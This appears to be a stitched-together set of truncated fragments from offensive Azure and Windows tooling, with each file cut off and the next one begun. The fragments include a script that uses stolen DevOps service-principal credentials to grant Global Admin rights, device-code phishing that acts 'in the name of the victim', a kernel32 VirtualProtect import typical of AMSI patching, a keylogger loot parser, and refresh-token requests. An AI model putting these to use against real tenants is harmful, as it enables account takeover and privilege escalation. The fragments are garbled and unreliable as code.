:: NOTE: If you don't want to make proxy settings for the whole machine,
:: find the line in this script that starts with "reg add" and change
:: "HKLM" to "HKCU" so that it only affects the current user (or change it
:: to reflect the specific hive that you want to change)
:: Supported Characters in proxy server address (if you need more, consult
:: an ascii table and make a new "if" statement for the character you need,
:: but these should suffice):
:: * - . / : ; = ? @ ~ < >
:: All Numbers
# Author: Marius Elmiger (@m8r1us)
# Description: Use extracted DevOps Credentials from a Service Principal to grant Global Admin rights by chaining AppRoleAssignment.ReadWrite.All with RoleManagement.ReadWrite.Directory
#
# The script includes code from https://gist.github.com/andyrobbins/7e52f6fe255a2dcadb69745dc8640441#file-api-abuse-to-ga-ps1 (@_wald0)
# 1 The Azure AD User I want to add to GA Role (objectid)
$userToAddToGa = "3bffb11a-b991-4d1f-....."
# 2 Extracted information from Azure DevOps
$applicationId = "64396535663062302D666163392D....."
# Author: Marius Elmiger (@m8r1us)
# Description: Script to automate the Azure AD Device Code Flow
# Define an Azure AD Application from which you want to connect in the name of the victim to a resource
# client_id = Microsoft Office App
# resource = Microsoft Graph
$body=@{
    "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
    "resource" = "https://graph.microsoft.com"
}
$MethodDefinition = @"
[DllImport(`"kernel32`", EntryPoint="GetProcAddress")]
public static extern IntPtr GetProc(IntPtr hModule, string procName);
[DllImport(`"kernel32`")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport(`"kernel32`",EntryPoint="VirtualProtect" )]
public static extern bool Virtual(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
"@;
# Author: Marius Elmiger (@m8r1us)
# Description: Simple KeyCroc croc_char.log analysis script
# Croc_char.log location
$file = "C:\tmp\croc_char.log"
$content = Get-Content $file
# Format Loot file with line breaks
$modifiedText = $content -replace '(\[[^\]]+\])', "`n`$1`n"
$modifiedText = $modifiedText -replace "`n{2,}", "`n"
{
  "nodes": [
    {
      "id": "n0",
      "position": {
        "x": 1239.9485302406829,
        "y": 11.014798303606455
      },
      "caption": "Domain Controller",
      "labels": [],
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>File Uploader</title>
<script>
/*!
 * jQuery JavaScript Library v1.7.1
 * http://jquery.com/
 *
 * Copyright 2011, John Resig
# Define an Azure AD Application from which you want to connect in the name of the victim to a resource
# client_id = Microsoft Office App
# resource = Microsoft Graph
$body=@{
    "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
    "resource" = "https://graph.microsoft.com"
}
# Define a UserAgent that is widely used
$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
fetch('https://name.azurewebsites.net/api/HttpTrigger1', {
  method: 'POST',
  body: "<yourcontent>",
  headers: {'x-functions-key': 'key'}
});
$TenantId = ""
$authUrl = "https://login.microsoftonline.com/$($TenantId)"
$body = @{
    "scope" = "https://management.azure.com/.default offline_access openid"
    "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
    "grant_type" = "refresh_token"
    "refresh_token" = ""
}